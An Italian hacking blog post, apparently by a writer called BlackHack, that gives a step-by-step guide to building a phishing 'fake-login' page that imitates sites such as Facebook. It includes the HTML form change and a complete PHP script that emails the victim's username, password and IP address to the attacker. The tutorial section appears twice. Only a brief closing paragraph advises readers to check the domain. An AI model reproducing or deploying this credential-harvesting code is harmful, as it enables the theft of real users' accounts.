Intro al fake-login
Infatti tratto questo argomento solo a scopo informativo e nella speranza che vi sia utile come esercizio di PHP.
Cosa è il fake-login
Allora, il fake-login è, come dice il nome stesso, una finta pagina di login che da molti viene usata come trappola verso i cosidetti "nabbi" che credono a tutto ciò che gli dici.
Più precisamente il fake-login è una pagina di login uguale alle login form dei siti più famosi, quali facebook, messenger ecc.. (sempre contanto che essendo famose non sono necessariamente da gente furba, anzi...)
Come si crea un fake-login
Come ho già detto prima, il fake-login è una pagina PHP, e quindi per crearlo servirà sapere il PHP:...
Per chi non lo conoscesse, spero veramente che prima di continuare a leggere se lo studi....
Comunque iniziamo subito...
Come prima cosa scegliete il sito di cui volete copiare la pagina e fatene una copia del sorgente...
Poi dovete trovare il form di login e dovete semplicemente far in modo che quando si prema il tasto ACCEDI la vittima venga ridirottata su una nostra pagina PHP... come? semplice
il form di login se semplice dovrebbe essere una cosa del genere:
<form method="post" action="home.php"> (poi ci sono tutte le classi gli id e il codice JS al max)
<input type="text" name="username" />
<input type="password" name="pass" />
<input type="submit" name="accedi" />
Quindi basta cambiare la parte scritta in blu...
Adesso bisogna crearsi la pagina php che dovrebbe avere un codice del genere:
<?
$ip = getenv ('REMOTE_ADDR');
$username = $_POST ["username"];
$password = $_POST ["pass"];
$oggetto = "account vittima fake-login";
$miamail = "blackhack00@live.it"; // mettete la vostra mail qua mi racc, se no mi inviate i dati a me
$dati = 'Username: ' .$username. '<br /> password: ' .$password. '<br /> Ip: ' .$ip . 'by BlackHack00, visit duxhack.blogspot.com'
mail ($miamail, $oggetto, $dati); //questo codice lo ho fatto in 5 min, quindi ditemi se cè qualche errore
?>
A questo punto se la vittima abboccherà all'amo vi manderà automaticamente una mail con username password e IP
Comunque iniziamo subito...
Come prima cosa scegliete il sito di cui volete copiare la pagina e fatene una copia del sorgente...
Poi dovete trovare il form di login e dovete semplicemente far in modo che quando si prema il tasto ACCEDI la vittima venga ridirottata su una nostra pagina PHP... come? semplice
il form di login se semplice dovrebbe essere una cosa del genere:
<form method="post" action="home.php"> (poi ci sono tutte le classi gli id e il codice JS al max)
<input type="text" name="username" />
<input type="password" name="pass" />
<input type="submit" name="accedi" />
Quindi basta cambiare la parte scritta in blu...
Adesso bisogna crearsi la pagina php che dovrebbe avere un codice del genere:
<?
$ip = getenv ('REMOTE_ADDR');
$username = $_POST ["username"];
$password = $_POST ["pass"];
$oggetto = "account vittima fake-login";
$miamail = "blackhack00@live.it"; // mettete la vostra mail qua mi racc, se no mi inviate i dati a me
$dati = 'Username: ' .$username. '<br /> password: ' .$password. '<br /> Ip: ' .$ip . 'by BlackHack00, visit duxhack.blogspot.com'
mail ($miamail, $oggetto, $dati); //questo codice lo ho fatto in 5 min, quindi ditemi se cè qualche errore
?>
A questo punto se la vittima abboccherà all'amo vi manderà automaticamente una mail con username password e IP
Riconoscere un fake-login
Riconoscere un fake-login è facilissimo, infatti basta semplicemente controllare di essere sul vero dominio di quel sito.
Un esempio di pagina falsa è quella qua a fianco, infatti non ci troviamo su www.facebook.com, ma bensì su un altro sito...
Quindi state molto attenti e non fatevi ingannare da nessuno...
Alla prossima, BlackHack
Nessun commento:
Posta un commento